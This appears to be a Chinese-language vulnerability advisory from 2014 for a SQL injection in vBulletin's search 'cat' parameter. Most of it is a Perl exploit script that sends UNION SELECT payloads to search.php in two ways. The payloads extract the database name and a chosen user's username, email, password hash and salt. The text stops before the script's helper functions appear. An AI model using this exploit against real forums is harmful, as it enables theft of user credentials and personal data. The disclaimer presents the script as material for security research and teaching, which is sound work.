发布日期:2014-09-03
更新日期:2014-09-04
受影响系统:
VBulletin VBulletin
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 69572
VBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。
vBulletin在cat参数的实现上存在SQL注入漏洞,成功利用后可使攻击者执行未授权数据库操作。
<*来源:D35m0nd142
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env perl
use LWP::UserAgent;
use HTTP::Cookies;
$ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0");
$ua->cookie_jar({});
$username = "username) from user where userid=$ARGV[4]#";
$email = "email) from user where userid=$ARGV[4]#";
$password = "password) from user where userid=$ARGV[4]#";
$salt = "salt) from user where userid=$ARGV[4]#";
@tofinds = ('database())#'); push(@tofinds,$username); push(@tofinds,$email); push(@tofinds,$password); push(@tofinds,$salt);
sub request
{
my $token = dumping("vbloginout.txt","token");
if($token eq '')
{
print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n";
#print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n";
$token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE
print "Attempting using $token as token.\n";
}
else
{
print "SECURITYTOKEN FOUND: $token\n";
}
print "Sending exploit...\n\n";
sleep(1);
my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php?search_type=1');
$req->content_type('application/x-www-form-urlencoded');
foreach $tofind (@tofinds)
{
$post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
$req->content($post);
my $res = $ua->request($req);
#print $res->headers()->as_string; print "\n\n";
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
my $location = dumping("vbloc.txt","loc");
if($location !~ /$ARGV[0]/)
{
banner();
break;
}
#print "Location: $location\n";
my $req1 = HTTP::Request->new(GET => $location);
$req1->content_type('application/x-www-form-urlencoded');
my $res1 = $ua->request($req1);
#print $res1->content; print "\n";
open(FILE,"> vbout.txt");
print FILE $res1->content;
close(FILE);
printout($tofind);
dumping("vbout.txt","sql");
print "\n";
}
print "\n";
print "Do you want to run the second exploitation way? (y/n) -> ";
$want = <STDIN>;
if($want =~ /y/)
{
second_request($token);
}
}
sub second_request
{
my ($token) = @_ ;
print "Attempting using the second exploitation way..\n\n";
sleep(2);
my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php');
$req->content_type('application/x-www-form-urlencoded');
foreach $tofind (@tofinds)
{
$post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
$req->content($post);
my $res = $ua->request($req);
#print $res->headers()->as_string; print "\n\n";
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
my $location = dumping("vbloc.txt","loc");
if($location !~ /$ARGV[0]/)
{
banner();
exit(1);
}
#print "Location: $location\n";
my $req1 = HTTP::Request->new(GET => $location);
$req1->content_type('application/x-www-form-urlencoded');
my $res1 = $ua->request($req1);
#print $res1->content; print "\n";
open(FILE,"> vbout.txt");
print FILE $res1->content;
close(FILE);
printout($tofind);
dumping("vbout.txt","sql");
print "\n";
}
print "\n";
}